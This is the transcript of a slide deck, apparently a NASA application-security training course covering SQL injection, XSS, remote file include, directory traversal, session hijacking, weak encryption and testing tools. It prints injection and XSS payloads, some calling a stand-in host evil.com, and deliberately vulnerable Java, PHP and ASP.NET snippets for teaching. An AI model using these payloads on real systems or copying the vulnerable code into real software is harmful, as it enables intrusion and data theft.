Application and Website Security -- Fundamental Edition

Application and Website Security – Fundamental Edition

Daniel OwensIT Security Professional

Agenda

Course Introduction

Common Input Validation Flaws

Common Access Control Flaws

Common Encryption Flaws

Tools

Conclusion And Appendices

Purpose

Drum up interest

Session Prerequisites

None

Communication Media and Security Concerns

Communication media:

„Wired‟ networks

„Wireless‟ networks

Security concerns:

The Insider

The Outsider

The Technology

Nature

A Note About Security

Security helps functionality – if it doesn’t help functionality, it isn’t security.

-Daniel Owens

Consequences of Poor Security

Stolen intellectual property

System downtime

Lost productivity

Damage to NASA‟s reputation

Lost public confidence

Lost revenue

Congressional inquiries

Agenda

Course Introduction




Tools


SQL | LDAP Injection

SQL and LDAP Injection

The injection of malicious code intended to bypass filtering and execute a query of the attacker‟s choosing

Can be thwarted using strongly typed variables, parameterized statements, escaping, and whitelists

Example Strings include:

1‟1

%31%27%20%4F%52%20%27%31%27%3D%27%31

&#49&#39&#32&#79&#82&#32&#39&#49&#39&#61&#39&#49

*(|(mail=*))

Java SQL Injection

static void main(String[] args){

Connection conn=null;

String username=args[0];

String password=args[1];

String query=“SELECT uid, pass FROM users WHERE uid LIKE “+username+”%”;

conn=DriverManager.getConnection(“jdbc:odbc:logistics”,”admin”,”LetMeIn”);

Statement stmnt=conn.createStatement();

ResultSet rs=stmnt.executeQuery(query);

…

}

Demonstration 1

SQL Injection

Bypassing Security Checks

Case Study 1

SQL Injection

Owning Networks

Cross-Site Scripting (XSS)

XSS

The injection of client-side code

Comes in three kinds:

Persistent

Non-Persistent

DOM

Only occurs when user input influences the output

Can be stopped by assuming all input is malicious until proven otherwise through a whitelist

Can lead to a complete system compromise – for the client, the website, and the server

Cross-Site Scripting (cont.)

XSS (cont.)

Sample strings:

<script src=http://evil.com/attack.js << </script <<

<link rel=“stylesheet” href=http://evil.com/attack.css>

%3Cscript%3Epref%3Dfunction(a%2Cb) {document.write(a%2B%22%20-%3E%20%22%2Bb%2B%22%3Cbr%20%2F%3E%22)%3B} %3B%3C%2Fscript%3E%3Cscript%20src%3D%22view-source%3Aresource%3A%2F%2F%2Fgreprefs%2Fall.js%22%3E%3C%2Fscript%3E

<img src=”” onMouseOver=”alert(document.cookie)”; />

http://evil.source.com/attack.js

http://evil.com/attack.css

ASP.NET Cross-Site Scripting

<%@ Page Language="C#" ValidateRequest="false" %>

<html>

<script runat="server">

void btnSubmit_Click(Object sender, EventArgs e)

{

Response.Write(txtString.Text);

}

</script>

// CONTINUED ON NEXT SLIDE

ASP.NET Cross-Site Scripting (cont.)

// CONTINUED FROM PREVIOUS SLIDE

<body>

<form id="form1" runat="server">

<asp:TextBox id="txtString" runat="server"

Text="<script>alert(„hi‟);</script>" />

<asp:Button id="btnSubmit" runat="server"

OnClick="btnSubmit_Click"

Text="Submit" />

</form>

</body>

</html>

Demonstration 2

XSS

Having Fun

Remote File Include/Execution | Code Injection

Remote File Include and Execution

An attacker tricks the system into including and/or executing arbitrary files

Code Injection

Attacker tricks the system into executing arbitrary code by injecting the commands into the code

Both

Code of the attacker‟s choosing is executed

Contrary to popular belief, ANY language can suffer this

PHP Remote File Include

<?php

….

require_once($_GET[„config‟]);

require_once($_GET[„base‟].”/index.php”);

….

?>

ASP.NET Remote File Include

<%

….

set url = Request.QueryString;

set xml =Server.CreateObject(“Microsoft.XMLHTTP”);

xml.open “GET”, url, false

xml.send “”

Response.write xml.responseText

set xml = nothing

….

%>

Hidden Elements | Cookies

Hidden Elements and Cookies

Hidden fields and cookies were merely intended to provide data storage without cluttering up the user‟s view

They do not provide secure storage

They are not immutable storage locations

Neither should contain sensitive information

Both should be considered malicious until proven otherwise

Any data in it should not be directly used for output

Whitelisting should be used to prove innocence

Hidden Elements | Cookies (cont.)

Hidden Elements and Cookies (cont.)� -575840793ReferrerUrlQhttps://XXX.XXX.nasa.gov/CMTOOLS/Login.aspx?ReturnUrl=/CMTOOLS/ErrorPage.aspxTextErrorddOnClickreturnconfirm ... „USERNAME (RandomData)'); return false;ddhSetTargetText('ctl00_SimpleSearchForm_User2_InputFieldTextbox', „USERNAME (<a href=pizza.gov>pizza is good for you</a>USERACCOUNT)'); return; fd-ctl00$SimpleSearchForm$User1$UserListGridView<+� fd

Agenda

Course Introduction




Tools


Session Hijacking – Cookie Theft

Cookie Theft

The theft of a client‟s cookies by an attacker

Often possible because of other vulnerabilities –browser flaws (sandboxing), having TRACE enabled, XSS, etc

Can be hampered if mechanisms such as NONCEs are used

NONCEs should be a set of characteristics unique to the specific session – client IP, server IP, server port, user agent string, and other key information

Additional mechanisms include using secure cookies, but this has limited impact

Session Hijacking – Session Fixation

Session Fixation

An attacker uses a „known‟ session ID

Often, the attacker opens the session and keeps it open while attempting to convince a victim to login using the known session

This is often a phishing or other social engineering attack

Can be hampered if session IDs are „rekeyed‟ on login AND sessions expire and are removed quickly

Difficult to stop if sessions are guessable

Demonstration 3

Session Hijacking

Session Fixation

Directory Traversal

Directory Traversal

An attacker is able to trick the system into traversing the directory structure

In many instances, arbitrary files can be viewed

Attackers are often attempting to execute a file or gather information

If user input dictates the output, care must be taken to ensure the input is „valid‟

Whitelists become invaluable

In extreme cases, an attacker can actually use this to gain administrator access to the server

PHP Directory Traversal

<?php

….

$date=$_GET[„date‟];

if($handle=fopen(“calendar/$date”,”rb”)){

print(fread($handle,filesize(“calendar/$date”)));

fclose($handle);

}

….

?>

Agenda

Course Introduction




Tools


Session Hijacking – Spoofing

Spoofing

Pretending to be someone else, an attacker attempts to gain the victim‟s privileges

Comes in three basic forms

Blind (write-only)

Half pipe (read-only)

Full pipe

Network configuration and other protection mechanisms can make this difficult to defeat (both for the attacker and for the developer)

Demonstration 4

Session Hijacking

Spoofing

Case Study 2

Session Hijacking

Spoofing

Weak Encryption | Using Encoding

Weak/Home-Grown Encryption

The use of weak and home grown encryption has led to the compromise of many systems

It is also what makes session hijacking via spoofing, and man-in-the-middle with bucket brigade and substitution attacks so trivial

Encoding

The use of algorithms that take output and simply change the format (normally it is the number of bits used per character)

This is not secure by any means

Case Study 3

Weak Encryption | Encoding

XORSHA

Base64

Agenda

Course Introduction




Tools

Conclusion and Appendices

Security Compass

XSS-Me

A free Firefox plug-in

Performs semi-automated XSS attacks against POST fields

SQL Inject-Me

A free Firefox plug-in

Performs semi-automated SQL injection attacks against POST fields

Access-Me

A free Firefox plug-in…

Other Firefox Add-ons

Web Developer Add-on

Free

Let‟s you view source files cleanly and easily

Let‟s you quickly enable and disable things (like cookies, JavaScript, and Meta Refresh)

Let‟s you view and modify form fields and cookie data

Tamper Data

Free

Let‟s you modify most request data

Fuzzers

BED.pl

Free Perl script

Performs basic tests of your SERVER

JBroFuzz

Free Java application

Let‟s you fuzz any part of an HTTP/HTTPS request in a semi-automated fashion

Powerfuzzer

Free and commercial versions (Python script)

Easy and multi-talented… automated

Other Tools

Sothink SWF Decompiler

Decompiles any Adobe Flash or Flux script

Cavaj

Free

Decompiles any Java program

Nikto

Free

Provides scans of the website looking for common, basic vulnerabilities and misconfigurations

Agenda

Course Introduction




Tools


For More Information

Microsoft Security Site (all audiences)

http://www.microsoft.com/security

MSDN Security Site (developers)

http://msdn.microsoft.com/security

TechNet Security Site (IT professionals)

http://www.microsoft.com/technet/security

SANS Top-20 (IT Professionals)

http://www.sans.org/top20/



http://msdn.microsoft.com/security



http://www.sans.org/top20/

For More Information (cont.)

Common Weakness Enumeration (CWE)/SANS Top 25 Most Dangerous Programming Errors (developers)

http://cwe.mitre.org/top25/index.html

GRC IT Security Office

http://itsecurity.grc.nasa.gov

Most Common Software Errors

http://discussweb.com/software-testing/803-most-common-software-errors.html

http://cwe.mitre.org/top25/index.html

http://itsecurity.grc.nasa.gov












Acknowledgements

I stole the background from Microsoft

I stole a lot from my experiences and previous writings

Application and Website Security -- Fundamental Edition

Technology

Transcript of Application and Website Security -- Fundamental Edition